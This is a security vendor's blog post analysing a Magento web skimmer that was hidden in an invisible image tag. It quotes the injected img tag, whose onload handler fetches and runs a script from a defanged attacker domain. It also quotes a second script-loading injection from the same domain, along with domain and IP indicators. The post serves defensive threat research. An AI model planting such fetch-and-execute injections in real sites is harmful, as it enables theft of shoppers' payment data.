• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Web Swiper in Image Title

Web Swiper in Image Title

January 27, 2020Denis Sinegubko

FacebookTwitterSubscribe

Cybercriminals regularly try a variety of approaches to hide their malicious code — web skimmers are well known for using all sorts of obfuscation and masquerading.

Suspicious Img Tag

Our malware analyst Liam Smith recently discovered a suspicious looking image tag in the database of a compromised Magento site.

<img height="1px" width="1px" style="display:none;"
src="/skin/frontend/smartwave/mango/images/cs_logo_white.png"
title="hxxps://intljs.rmtag[.]net/js/slider.js"
onload=jQuery.getScript(this.title)>

At first glance, it just looks like <img> tag that loads a real image file. However, a deeper analysis reveals a few strange things:

  • The image dimensions are 1x1px with the “display:none;” style. It’s basically an invisible pixel.
  • There is a URL of a third-party JavaScript file in the title parameter.
  • There is an onload handler that loads and executes a remote script from the URL stored in the title parameter.

This doesn’t look like a legit use of an <img> tag, does it? So, what can this remote script do?

Conditional Skimmer Injection

If you load the remote script, you’ll see the real slider code and nothing else. However, if the same script is loaded from the checkout page, this long single-line script gets appended with some extra code at the very end.

Malicious Code in img title
Malicious code appended at the end which blends into the legitimate code

This malware is heavily obfuscated. After a few rounds of decoding, you get this code that retrieves payment information from the checkout form and sends it to hxxps://intljs.rmtag[.]net/on/.

Deobfuscated credit card stealer found in img tag
Part of the deobfuscated malware that steals payment details

Past Variations

We found that the intljs.rmtag[.]net domain has been used in a few more web skimmers. For example, the following code was found several months ago on another ecommerce site.

<script>jQuery.getScript("hxxps://intljs.rmtag[.]net/app/113830.js");</script>

In this case, the injection is not as elaborate as in this <img> tag sample, but it also uses the quite rare jQuery.getScript technique.

Bad Neighborhood

The rmtag[.]net domain was originally created a year ago on Jan. 6, 2019. While it has been renewed for another year, until 2021, the second level domain is parked. However, the “intljs” subdomain points to a different IP 207.244.67.218 which belongs to a server with lots of sketchy and malicious sites.

WHOIS and Domains List from sketchy server hosting malware
Information from https://dnslytics.com/ip/207.244.67.218

Most of the domains on this IP once redirected to scam sites via hxxps://sarah.tncrun[.]net/tr.

Conclusion

Currently, some of the most customized malware on infected client sites are being found in the form of web skimmers. Criminals are taking the time to modify their injected code almost for every compromised site. Customizations vary from case to case, with obfuscation techniques increasing the time that the skimmer goes undetected and extending its ability to steal credit card and personal information from the compromised environment.

This particular infection includes the sneaky use of an <img> tag with a malicious title and onload handler, along with conditional loading of a web skimmer script. On other compromised ecommerce sites we’re seeing a variety of tricks, including the use of fake domains pretending to be reputable scripts and libraries — and we’re findinging more techniques every day.

What this means is that online stores shouldn’t count on particular malware patterns. Instead, websites should use integrity control tools and professional security monitoring to identify malicious behaviour and indicators of compromise.

If you find a web skimmer on your site or suspect malicious activity, we can help with a thorough scan and malware removal.

FacebookTwitterSubscribe

Categories: Ecommerce Security, Magento Security, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Credit Card Stealers, Hacked Websites

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.